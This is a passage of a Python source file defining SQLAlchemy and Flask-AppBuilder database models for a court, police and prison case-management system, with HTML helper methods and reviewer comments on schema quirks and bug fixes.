            '" type="audio/mpeg">' + '<i class="fa fa-volume-up"></i>' +
            'Your browser does not support the audio element.' + '</audio>')

    id = Column(Integer, primary_key=True, autoincrement=True)
    gender = Column(ForeignKey(u'gender.id'), index=True)
    # Bar registration number.
    barnumber = Column(String(20))
    law_firm = Column(ForeignKey(u'lawfirm.id'), index=True)
    admissiondate = Column(Date)
    gender1 = relationship(
        u'Gender', primaryjoin='Lawyer.gender == Gender.id', backref=u'lawyers')
    lawfirm = relationship(
        u'Lawfirm',
        primaryjoin='Lawyer.law_firm == Lawfirm.id',
        backref=u'lawyers')
class Medevent(ActivityMixin, AuditMixin, Model):
    """Medical event; activity fields come from ActivityMixin."""
    __versioned__ = {}
    __tablename__ = 'medevent'
    id = Column(Integer, primary_key=True, autoincrement=True)
class Natureofsuit(RefTypeMixin, AuditMixin, Model):
    """Nature-of-suit reference model (lookup)."""
    __versioned__ = {}
    __tablename__ = 'natureofsuit'
    id = Column(Integer, primary_key=True, autoincrement=True)
class Payment(AuditMixin, Model):
    """A payment record, tied to a bail and optionally a case."""
    __versioned__ = {}
    __tablename__ = 'payment'
    id = Column(Integer, primary_key=True, autoincrement=True)
    datepaid = Column(DateTime, default=func.now())
    amount = Column(Numeric(12, 2))
    paymentreference = Column(String(80), nullable=False)
    paymentconfirmed = Column(Boolean)
    paidby = Column(Text, nullable=False)
    # Payer phone number (MSISDN), when paid via mobile money.
    msisdn = Column(Text)
    receiptnumber = Column(String(100), nullable=False)
    # True when this payment covers only part of the amount due.
    ispartial = Column(Boolean)
    bail = Column(ForeignKey(u'bail.id'), nullable=False, index=True)
    billrefnumber = Column(Text, nullable=False)
    payment_method = Column(
        ForeignKey(u'paymentmethod.id'), nullable=False, index=True)
    paymentdescription = Column(Text, nullable=False)
    case = Column(ForeignKey(u'case.id'), index=True)
    bail1 = relationship(
        u'Bail', primaryjoin='Payment.bail == Bail.id', backref=u'payments')
    case1 = relationship(
        u'Case', primaryjoin='Payment.case == Case.id', backref=u'payments')
    paymentmethod = relationship(
        u'Paymentmethod',
        primaryjoin='Payment.payment_method == Paymentmethod.id',
        backref=u'payments')
class Paymentmethod(RefTypeMixin, AuditMixin, Model):
    """Payment method with gateway credentials.

    NOTE(review): `key` and `secret` are stored as plain Text columns —
    confirm whether they are encrypted elsewhere before this goes to
    production.
    """
    __versioned__ = {}
    __tablename__ = 'paymentmethod'
    id = Column(Integer, primary_key=True, autoincrement=True)
    # Gateway API credentials and endpoint.
    key = Column(Text, nullable=False)
    secret = Column(Text, nullable=False)
    portal = Column(Text, nullable=False)
    # Mobile-money till number and short code.
    tillnumber = Column(Text, nullable=False)
    shortcode = Column(Text, nullable=False)
class Plaintiff(PersonMixin, ContactMixin, AuditMixin, Model):
    """Plaintiff record; person/contact fields come from the mixins."""
    __versioned__ = {}
    __tablename__ = 'plaintiff'

    def ViewName(self):
        """Return the Flask-AppBuilder view name, e.g. 'PlaintiffView'."""
        return self.__class__.__name__ + 'View'

    def photo_img(self):
        """Return Markup with the full-size photo linked to the show view."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' + im.get_url(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        else:
            return Markup(
                '<a href="' + url_for(vn, pk=str(self.id)) +
                '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
            )

    def photo_img_thumbnail(self):
        """Return Markup with the thumbnail photo linked to the show view."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' +
                im.get_url_thumbnail(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        else:
            return Markup(
                '<a href="' + url_for(vn, pk=str(self.id)) +
                '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
            )

    def print_button(self):
        """Return Markup for a print button linking to this record's view."""
        vn = self.ViewName()
        return Markup(
            '<a href="' + url_for(vn) +
            '" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
            + 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')

    def audio_play(self):
        """Return Markup for an HTML5 audio player for this record.

        Bug fix: the '>' closing the <source> tag sat outside the string
        literal, which applied unary plus to a str and raised TypeError at
        call time; it now lives inside the literal.
        """
        vn = self.ViewName()
        return Markup(
            '<audio controls autoplay>' + '<source src="' + url_for(vn) +
            '" type="audio/mpeg">' + '<i class="fa fa-volume-up"></i>' +
            'Your browser does not support the audio element.' + '</audio>')

    id = Column(Integer, primary_key=True, autoincrement=True)
    gender = Column(ForeignKey(u'gender.id'), index=True)
    # True when the plaintiff is a minor.
    juvenile = Column(Boolean)
    gender1 = relationship(
        u'Gender',
        primaryjoin='Plaintiff.gender == Gender.id',
        backref=u'plaintiffs')
class Policerank(RefTypeMixin, AuditMixin, Model):
    """Police rank reference model (lookup)."""
    __versioned__ = {}
    __tablename__ = 'policerank'
    id = Column(Integer, primary_key=True, autoincrement=True)
class Policerole(RefTypeMixin, AuditMixin, Model):
    """Police role reference model; M2M to officers."""
    __versioned__ = {}
    __tablename__ = 'policerole'
    id = Column(Integer, primary_key=True, autoincrement=True)
    polofficer = relationship(
        u'Polofficer',
        secondary='polofficer_policerole',
        backref=u'policeroles')
class Policestation(PlaceMixin, AuditMixin, Model):
    """A police station located in a town, with a station type."""
    __versioned__ = {}
    __tablename__ = 'policestation'
    id = Column(Integer, primary_key=True, autoincrement=True)
    town = Column(ForeignKey(u'town.id'), nullable=False, index=True)
    # Name of the officer commanding the station.
    officercommanding = Column(String(100))
    police_station_type = Column(
        ForeignKey(u'policestationtype.id'), nullable=False, index=True)
    policestationtype = relationship(
        u'Policestationtype',
        primaryjoin='Policestation.police_station_type == Policestationtype.id',
        backref=u'policestations')
    town1 = relationship(
        u'Town',
        primaryjoin='Policestation.town == Town.id',
        backref=u'policestations')
class Policestationtype(RefTypeMixin, AuditMixin, Model):
    """Police station type reference model (lookup)."""
    __versioned__ = {}
    __tablename__ = 'policestationtype'
    id = Column(Integer, primary_key=True, autoincrement=True)
class Polofficer(AuditMixin, Model):
    """Police officer, with rank and a self-referencing reporting chain."""
    __versioned__ = {}
    __tablename__ = 'polofficer'
    id = Column(Integer, primary_key=True, autoincrement=True)
    police_rank = Column(
        ForeignKey(u'policerank.id'), nullable=False, index=True)
    gender = Column(ForeignKey(u'gender.id'), nullable=False, index=True)
    servicenumber = Column(Text)
    # Officer this one reports to (adjacency-list hierarchy).
    reports_to = Column(ForeignKey(u'polofficer.id'), index=True)
    # NOTE(review): despite the name, pol_supervisor references case.id and
    # the relationship below joins to Case — verify the intended schema.
    pol_supervisor = Column(ForeignKey(u'case.id'), nullable=False, index=True)
    postdate = Column(Date)
    gender1 = relationship(
        u'Gender',
        primaryjoin='Polofficer.gender == Gender.id',
        backref=u'polofficers')
    case = relationship(
        u'Case',
        primaryjoin='Polofficer.pol_supervisor == Case.id',
        backref=u'polofficers')
    policerank = relationship(
        u'Policerank',
        primaryjoin='Polofficer.police_rank == Policerank.id',
        backref=u'polofficers')
    parent = relationship(
        u'Polofficer',
        remote_side=[id],
        primaryjoin='Polofficer.reports_to == Polofficer.id',
        backref=u'polofficers')
# M2M link: police officers <-> police roles.
polofficer_policerole = Table(
    'polofficer_policerole', Model.metadata,
    Column('polofficer', ForeignKey(u'polofficer.id'), primary_key=True,
           nullable=False),
    Column('policerole', ForeignKey(u'policerole.id'), primary_key=True,
           nullable=False, index=True))
class Prison(PlaceMixin, AuditMixin, Model):
    """A prison facility with capacity/occupancy statistics."""
    __versioned__ = {}
    __tablename__ = 'prison'
    id = Column(Integer, primary_key=True, autoincrement=True)
    town = Column(ForeignKey(u'town.id'), nullable=False, index=True)
    # Name of the warden in charge.
    warden = Column(String(100))
    capacity = Column(Integer)
    population = Column(Integer)
    cellcount = Column(Integer)
    gatecount = Column(Integer)
    town1 = relationship(
        u'Town', primaryjoin='Prison.town == Town.id', backref=u'prisons')
    securityrank = relationship(
        u'Securityrank', secondary='prison_securityrank', backref=u'prisons')
# M2M link: prisons <-> security ranks.
prison_securityrank = Table(
    'prison_securityrank', Model.metadata,
    Column('prison', ForeignKey(u'prison.id'), primary_key=True,
           nullable=False),
    Column('securityrank', ForeignKey(u'securityrank.id'), primary_key=True,
           nullable=False, index=True))
class Prisoncell(AuditMixin, Model):
    """A cell within a prison."""
    __versioned__ = {}
    __tablename__ = 'prisoncell'
    id = Column(Integer, primary_key=True, autoincrement=True)
    prison = Column(ForeignKey(u'prison.id'), nullable=False, index=True)
    prison1 = relationship(
        u'Prison',
        primaryjoin='Prisoncell.prison == Prison.id',
        backref=u'prisoncells')
class Prisoncommital(ActivityMixin, AuditMixin, Model):
    """Commital of a defendant to prison under a warrant.

    Composite primary key: (prison, warrantno).
    """
    __versioned__ = {}
    __tablename__ = 'prisoncommital'
    prison = Column(ForeignKey(u'prison.id'), primary_key=True, nullable=False)
    warrantno = Column(String(100), primary_key=True, nullable=False)
    defendant = Column(ForeignKey(u'defendant.id'), nullable=False, index=True)
    hearing = Column(ForeignKey(u'hearing.id'), nullable=False, index=True)
    warrantdate = Column(DateTime, default=func.now())
    hascourtdate = Column(Boolean)
    judicial_officer_warrant = Column(
        ForeignKey(u'judicialofficer.id'), nullable=False, index=True)
    warrant = Column(Text, nullable=False)
    # Warrant validity in days; expiry is derived by the observer below.
    warrantduration = Column(Integer, nullable=False, default=7)
    warrantexpiry = Column(DateTime)

    @observes("warrantdate", "warrantduration")
    def warrant_expiration_observer(self, warrantdate, warrantduration):
        # Recompute expiry whenever the warrant date or duration changes.
        # NOTE(review): relies on `datetime` being the datetime *module*
        # (datetime.timedelta) — confirm the file's import; if it is the
        # datetime class this raises AttributeError.
        self.warrantexpiry = warrantdate + datetime.timedelta(warrantduration)

    history = Column(Text, nullable=False)
    earliestrelease = Column(Date)
    releasedate = Column(DateTime)
    # Personal property held on commital and its item count.
    property = Column(Text)
    itemcount = Column(Integer)
    releasenotes = Column(Text)
    commitalnotes = Column(Text)
    police_officer_commiting = Column(
        ForeignKey(u'polofficer.id'), nullable=False, index=True)
    paroledate = Column(Date)
    # Escape tracking.
    escaped = Column(Boolean)
    escapedate = Column(DateTime)
    escapedetails = Column(Text)
    defendant1 = relationship(
        u'Defendant',
        primaryjoin='Prisoncommital.defendant == Defendant.id',
        backref=u'prisoncommitals')
    hearing1 = relationship(
        u'Hearing',
        primaryjoin='Prisoncommital.hearing == Hearing.id',
        backref=u'prisoncommitals')
    judicialofficer = relationship(
        u'Judicialofficer',
        primaryjoin=
        'Prisoncommital.judicial_officer_warrant == Judicialofficer.id',
        backref=u'prisoncommitals')
    polofficer = relationship(
        u'Polofficer',
        primaryjoin='Prisoncommital.police_officer_commiting == Polofficer.id',
        backref=u'prisoncommitals')
    prison1 = relationship(
        u'Prison',
        primaryjoin='Prisoncommital.prison == Prison.id',
        backref=u'prisoncommitals')
    warder = relationship(
        u'Warder',
        secondary='prisoncommital_warder',
        backref=u'prisoncommitals')
# Association table: warders assigned to a prison committal. The committal
# side is the composite key (prison, warrantno), hence the explicit
# ForeignKeyConstraint instead of single-column ForeignKey()s.
prisoncommital_warder = Table(
    'prisoncommital_warder', Model.metadata,
    Column('prisoncommital_prison', Integer, primary_key=True, nullable=False),
    Column(
        'prisoncommital_warrantno',
        String(100),
        primary_key=True,
        nullable=False),
    Column(
        'warder',
        ForeignKey(u'warder.id'),
        primary_key=True,
        nullable=False,
        index=True),
    ForeignKeyConstraint(
        ['prisoncommital_prison', 'prisoncommital_warrantno'],
        [u'prisoncommital.prison', u'prisoncommital.warrantno']))
class Prisonerproperty(RefTypeMixin, AuditMixin, Model):
    """Property held for a prisoner, keyed to a committal.

    References Prisoncommital's composite key (prison, warrantno)
    via an explicit ForeignKeyConstraint in __table_args__.
    """
    __versioned__ = {}
    __tablename__ = 'prisonerproperty'
    __table_args__ = (ForeignKeyConstraint([
        'prison_commital_prison', 'prison_commital_warrantno'
    ], [u'prisoncommital.prison', u'prisoncommital.warrantno']), Index(
        'idx_prisonerproperty__prison_commital_prison_prison_commital_wa',
        'prison_commital_prison', 'prison_commital_warrantno'))
    id = Column(Integer, primary_key=True, autoincrement=True)
    prison_commital_prison = Column(Integer, nullable=False)
    prison_commital_warrantno = Column(String(100), nullable=False)
    # Whether a receipt was issued for the held property.
    receipted = Column(Boolean)
    prisoncommital = relationship(
        u'Prisoncommital',
        primaryjoin=
        'and_(Prisonerproperty.prison_commital_prison == Prisoncommital.prison, Prisonerproperty.prison_commital_warrantno == Prisoncommital.warrantno)',
        backref=u'prisonerproperties')
class Prosecutor(PersonMixin, ContactMixin, AuditMixin, Model):
    """Prosecutor person record.

    Person/contact/audit fields come from the mixins; the methods below
    render HTML snippets used by the Flask-AppBuilder views.
    """
    __versioned__ = {}
    __tablename__ = 'prosecutor'

    def ViewName(self):
        """Return the FAB view class name for this model, e.g. 'ProsecutorView'."""
        return self.__class__.__name__ + 'View'

    def photo_img(self):
        """Return Markup for the full-size photo linked to this record's show page."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' + im.get_url(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        # No photo uploaded: blank placeholder (src="//:0" renders nothing).
        # NOTE(review): this branch omits the '.show' endpoint suffix used
        # above — confirm the bare view endpoint is intended.
        return Markup(
            '<a href="' + url_for(vn, pk=str(self.id)) +
            '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
        )

    def photo_img_thumbnail(self):
        """Return Markup for the thumbnail photo linked to the show page."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' +
                im.get_url_thumbnail(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        return Markup(
            '<a href="' + url_for(vn, pk=str(self.id)) +
            '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
        )

    def print_button(self):
        """Return Markup for a tooltip'd print button pointing at this view."""
        vn = self.ViewName()
        return Markup(
            '<a href="' + url_for(vn) +
            '" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
            + 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')

    def audio_play(self):
        """Return Markup for an inline HTML5 audio player.

        BUG FIX: the original wrote `'" type="audio/mpeg"' > + '<i ...'`,
        i.e. a string compared (>) against a unary-plus string — unary `+`
        on str raises TypeError at runtime. The '>' closes the <source> tag.
        """
        vn = self.ViewName()
        return Markup(
            '<audio controls autoplay>' + '<source src="' + url_for(vn) +
            '" type="audio/mpeg">' + '<i class="fa fa-volume-up"></i>' +
            'Your browser does not support the audio element.' + '</audio>')

    # edit_form_extra_fields = {'field2': TextField('field2',
    # widget=BS3TextFieldROWidget())}
    id = Column(Integer, primary_key=True, autoincrement=True)
    gender = Column(ForeignKey(u'gender.id'), index=True)
    gender1 = relationship(
        u'Gender',
        primaryjoin='Prosecutor.gender == Gender.id',
        backref=u'prosecutors')
    prosecutorteam = relationship(
        u'Prosecutorteam',
        secondary='prosecutor_prosecutorteam',
        backref=u'prosecutors')
# Association table: many-to-many between Prosecutor and Prosecutorteam.
prosecutor_prosecutorteam = Table('prosecutor_prosecutorteam', Model.metadata,
    Column(
        'prosecutor',
        ForeignKey(u'prosecutor.id'),
        primary_key=True,
        nullable=False),
    Column(
        'prosecutorteam',
        ForeignKey(u'prosecutorteam.id'),
        primary_key=True,
        nullable=False,
        index=True))
class Prosecutorteam(RefTypeMixin, AuditMixin, Model):
    """Reference table of prosecutor teams (name/code come from RefTypeMixin)."""
    __versioned__ = {}
    __tablename__ = 'prosecutorteam'
    id = Column(Integer, primary_key=True, autoincrement=True)
class Remission(AuditMixin, Model):
    """Sentence remission earned under a prison committal.

    References Prisoncommital's composite key (prison, warrantno)
    via an explicit ForeignKeyConstraint in __table_args__.
    """
    __versioned__ = {}
    __tablename__ = 'remission'
    __table_args__ = (ForeignKeyConstraint([
        'prison_commital_prison', 'prison_commital_warrantno'
    ], [u'prisoncommital.prison', u'prisoncommital.warrantno']), Index(
        'idx_remission__prison_commital_prison_prison_commital_warrantno',
        'prison_commital_prison', 'prison_commital_warrantno'))
    id = Column(Integer, primary_key=True, autoincrement=True)
    prison_commital_prison = Column(Integer, nullable=False)
    prison_commital_warrantno = Column(String(100), nullable=False)
    # Days of remission earned and when; monetary amount if applicable.
    daysearned = Column(Integer)
    dateearned = Column(Date)
    amount = Column(Numeric(12, 2))
    prisoncommital = relationship(
        u'Prisoncommital',
        primaryjoin=
        'and_(Remission.prison_commital_prison == Prisoncommital.prison, Remission.prison_commital_warrantno == Prisoncommital.warrantno)',
        backref=u'remissions')
class Securityrank(RefTypeMixin, AuditMixin, Model):
    """Reference table of prison security ranks."""
    __versioned__ = {}
    __tablename__ = 'securityrank'
    id = Column(Integer, primary_key=True, autoincrement=True)

    def __repr__(self):
        # Display by the name field supplied by RefTypeMixin.
        return self.name
class Subcounty(AuditMixin, RefTypeMixin, Model):
    """A sub-county within a county."""
    __versioned__ = {}
    __tablename__ = 'subcounty'
    id = Column(Integer, primary_key=True, autoincrement=True)
    county = Column(ForeignKey(u'county.id'), nullable=False, index=True)
    county1 = relationship(
        u'County',
        primaryjoin='Subcounty.county == County.id',
        backref=u'subcounty')

    def __repr__(self):
        # Display by the name field supplied by RefTypeMixin.
        return self.name
class Surety(PersonMixin, ContactMixin, AuditMixin, Model):
    """Surety (bail guarantor) person record.

    Person/contact/audit fields come from the mixins; the methods below
    render HTML snippets used by the Flask-AppBuilder views.
    """
    __versioned__ = {}
    __tablename__ = 'surety'

    def ViewName(self):
        """Return the FAB view class name for this model, e.g. 'SuretyView'."""
        return self.__class__.__name__ + 'View'

    def photo_img(self):
        """Return Markup for the full-size photo linked to this record's show page."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' + im.get_url(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        # No photo uploaded: blank placeholder (src="//:0" renders nothing).
        return Markup(
            '<a href="' + url_for(vn, pk=str(self.id)) +
            '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
        )

    def photo_img_thumbnail(self):
        """Return Markup for the thumbnail photo linked to the show page."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' +
                im.get_url_thumbnail(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        return Markup(
            '<a href="' + url_for(vn, pk=str(self.id)) +
            '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
        )

    def print_button(self):
        """Return Markup for a tooltip'd print button pointing at this view."""
        vn = self.ViewName()
        return Markup(
            '<a href="' + url_for(vn) +
            '" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
            + 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')

    def audio_play(self):
        """Return Markup for an inline HTML5 audio player.

        BUG FIX: the original wrote `'" type="audio/mpeg"' > + '<i ...'`,
        i.e. a string compared (>) against a unary-plus string — unary `+`
        on str raises TypeError at runtime. The '>' closes the <source> tag.
        """
        vn = self.ViewName()
        return Markup(
            '<audio controls autoplay>' + '<source src="' + url_for(vn) +
            '" type="audio/mpeg">' + '<i class="fa fa-volume-up"></i>' +
            'Your browser does not support the audio element.' + '</audio>')

    # edit_form_extra_fields = {'field2': TextField('field2',
    # widget=BS3TextFieldROWidget())}
    id = Column(Integer, primary_key=True, autoincrement=True)
    gender = Column(ForeignKey(u'gender.id'), index=True)
    gender1 = relationship(
        u'Gender',
        primaryjoin='Surety.gender == Gender.id',
        backref=u'sureties')
class Tag(AuditMixin, Model):
    """Free-form tag record."""
    __versioned__ = {}
    __tablename__ = 'tag'
    id = Column(Integer, primary_key=True, autoincrement=True)

    def __repr__(self):
        # Display by name; assumes a `name` attribute is provided elsewhere
        # (e.g. by a mixin or versioning plugin) — TODO confirm.
        return self.name
class Town(AuditMixin, RefTypeMixin, Model):
    """A town within a sub-county."""
    __versioned__ = {}
    __tablename__ = 'town'
    id = Column(Integer, primary_key=True, autoincrement=True)
    subcounty = Column(ForeignKey(u'subcounty.id'), nullable=False, index=True)
    subcounty1 = relationship(
        u'Subcounty',
        primaryjoin='Town.subcounty == Subcounty.id',
        backref=u'towns')

    def __repr__(self):
        # Display by the name field supplied by RefTypeMixin.
        return self.name
class Visit(ActivityMixin, AuditMixin, Model):
    """A visitor's visit to a defendant.

    Composite primary key: (vistors, defendants).
    """
    __versioned__ = {}
    __tablename__ = 'visit'
    # NOTE(review): 'vistors' looks like a typo of 'visitors', but the name
    # is part of the database schema and the primaryjoin strings below —
    # renaming would be a schema migration, not a code cleanup.
    vistors = Column(
        ForeignKey(u'visitor.id'), primary_key=True, nullable=False)
    defendants = Column(
        ForeignKey(u'defendant.id'),
        primary_key=True,
        nullable=False,
        index=True)
    visitdate = Column(DateTime, default=func.now())
    visitnotes = Column(Text)
    # Duration stored as a PostgreSQL INTERVAL.
    visitduration = Column(INTERVAL)
    defendant = relationship(
        u'Defendant',
        primaryjoin='Visit.defendants == Defendant.id',
        backref=u'visits')
    visitor = relationship(
        u'Visitor',
        primaryjoin='Visit.vistors == Visitor.id',
        backref=u'visits')
class Visitor(PersonMixin, ContactMixin, AuditMixin, Model):
    """Prison visitor person record.

    Person/contact/audit fields come from the mixins; the methods below
    render HTML snippets used by the Flask-AppBuilder views.
    """
    __versioned__ = {}
    __tablename__ = 'visitor'

    def ViewName(self):
        """Return the FAB view class name for this model, e.g. 'VisitorView'."""
        return self.__class__.__name__ + 'View'

    def photo_img(self):
        """Return Markup for the full-size photo linked to this record's show page."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' + im.get_url(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        # No photo uploaded: blank placeholder (src="//:0" renders nothing).
        return Markup(
            '<a href="' + url_for(vn, pk=str(self.id)) +
            '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
        )

    def photo_img_thumbnail(self):
        """Return Markup for the thumbnail photo linked to the show page."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' +
                im.get_url_thumbnail(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        return Markup(
            '<a href="' + url_for(vn, pk=str(self.id)) +
            '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
        )

    def print_button(self):
        """Return Markup for a tooltip'd print button pointing at this view."""
        vn = self.ViewName()
        return Markup(
            '<a href="' + url_for(vn) +
            '" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
            + 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')

    def audio_play(self):
        """Return Markup for an inline HTML5 audio player.

        BUG FIX: the original wrote `'" type="audio/mpeg"' > + '<i ...'`,
        i.e. a string compared (>) against a unary-plus string — unary `+`
        on str raises TypeError at runtime. The '>' closes the <source> tag.
        """
        vn = self.ViewName()
        return Markup(
            '<audio controls autoplay>' + '<source src="' + url_for(vn) +
            '" type="audio/mpeg">' + '<i class="fa fa-volume-up"></i>' +
            'Your browser does not support the audio element.' + '</audio>')

    # edit_form_extra_fields = {'field2': TextField('field2',
    # widget=BS3TextFieldROWidget())}
    id = Column(Integer, primary_key=True, autoincrement=True)
    gender = Column(ForeignKey(u'gender.id'), nullable=False, index=True)
    gender1 = relationship(
        u'Gender',
        primaryjoin='Visitor.gender == Gender.id',
        backref=u'visitors')
class Warder(PersonMixin, ContactMixin, AuditMixin, Model):
    """Prison warder person record.

    Belongs to a prison, holds a rank, and may report to another warder
    (self-referential FK). HTML helper methods serve the FAB views.
    """
    __versioned__ = {}
    __tablename__ = 'warder'

    def ViewName(self):
        """Return the FAB view class name for this model, e.g. 'WarderView'."""
        return self.__class__.__name__ + 'View'

    def photo_img(self):
        """Return Markup for the full-size photo linked to this record's show page."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' + im.get_url(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        # No photo uploaded: blank placeholder (src="//:0" renders nothing).
        return Markup(
            '<a href="' + url_for(vn, pk=str(self.id)) +
            '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
        )

    def photo_img_thumbnail(self):
        """Return Markup for the thumbnail photo linked to the show page."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' +
                im.get_url_thumbnail(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        return Markup(
            '<a href="' + url_for(vn, pk=str(self.id)) +
            '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
        )

    def print_button(self):
        """Return Markup for a tooltip'd print button pointing at this view."""
        vn = self.ViewName()
        return Markup(
            '<a href="' + url_for(vn) +
            '" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
            + 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')

    def audio_play(self):
        """Return Markup for an inline HTML5 audio player.

        BUG FIX: the original wrote `'" type="audio/mpeg"' > + '<i ...'`,
        i.e. a string compared (>) against a unary-plus string — unary `+`
        on str raises TypeError at runtime. The '>' closes the <source> tag.
        """
        vn = self.ViewName()
        return Markup(
            '<audio controls autoplay>' + '<source src="' + url_for(vn) +
            '" type="audio/mpeg">' + '<i class="fa fa-volume-up"></i>' +
            'Your browser does not support the audio element.' + '</audio>')

    # edit_form_extra_fields = {'field2': TextField('field2',
    # widget=BS3TextFieldROWidget())}
    id = Column(Integer, primary_key=True, autoincrement=True)
    prison = Column(ForeignKey(u'prison.id'), nullable=False, index=True)
    warder_rank = Column(
        ForeignKey(u'warderrank.id'), nullable=False, index=True)
    # Self-referential FK: supervising warder, if any.
    reports_to = Column(ForeignKey(u'warder.id'), index=True)
    prison1 = relationship(
        u'Prison', primaryjoin='Warder.prison == Prison.id', backref=u'warders')
    parent = relationship(
        u'Warder',
        remote_side=[id],
        primaryjoin='Warder.reports_to == Warder.id',
        backref=u'warders')
    warderrank = relationship(
        u'Warderrank',
        primaryjoin='Warder.warder_rank == Warderrank.id',
        backref=u'warders')
class Warderrank(RefTypeMixin, AuditMixin, Model):
    """Reference table of warder ranks (name/code come from RefTypeMixin)."""
    __versioned__ = {}
    __tablename__ = 'warderrank'
    id = Column(Integer, primary_key=True, autoincrement=True)
class Witnes(PersonMixin, ContactMixin, AuditMixin, Model):
    """Witness person record (table 'witness').

    NOTE(review): the class name 'Witnes' looks like a typo of 'Witness',
    but it is referenced by primaryjoin strings and callers — renaming
    would be a breaking change, so it is kept.
    """
    __versioned__ = {}
    __tablename__ = 'witness'

    def ViewName(self):
        """Return the FAB view class name for this model, e.g. 'WitnesView'."""
        return self.__class__.__name__ + 'View'

    def photo_img(self):
        """Return Markup for the full-size photo linked to this record's show page."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' + im.get_url(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        # No photo uploaded: blank placeholder (src="//:0" renders nothing).
        return Markup(
            '<a href="' + url_for(vn, pk=str(self.id)) +
            '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
        )

    def photo_img_thumbnail(self):
        """Return Markup for the thumbnail photo linked to the show page."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' +
                im.get_url_thumbnail(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        return Markup(
            '<a href="' + url_for(vn, pk=str(self.id)) +
            '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
        )

    def print_button(self):
        """Return Markup for a tooltip'd print button pointing at this view."""
        vn = self.ViewName()
        return Markup(
            '<a href="' + url_for(vn) +
            '" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
            + 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')

    def audio_play(self):
        """Return Markup for an inline HTML5 audio player.

        BUG FIX: the original wrote `'" type="audio/mpeg"' > + '<i ...'`,
        i.e. a string compared (>) against a unary-plus string — unary `+`
        on str raises TypeError at runtime. The '>' closes the <source> tag.
        """
        vn = self.ViewName()
        return Markup(
            '<audio controls autoplay>' + '<source src="' + url_for(vn) +
            '" type="audio/mpeg">' + '<i class="fa fa-volume-up"></i>' +
            'Your browser does not support the audio element.' + '</audio>')

    # edit_form_extra_fields = {'field2': TextField('field2',
    # widget=BS3TextFieldROWidget())}
    id = Column(Integer, primary_key=True, autoincrement=True)
    # True when the witness testifies for the defense.
    fordefense = Column(Boolean)
    gender = Column(ForeignKey(u'gender.id'), nullable=False, index=True)
    gender1 = relationship(
        u'Gender', primaryjoin='Witnes.gender == Gender.id', backref=u'witness')
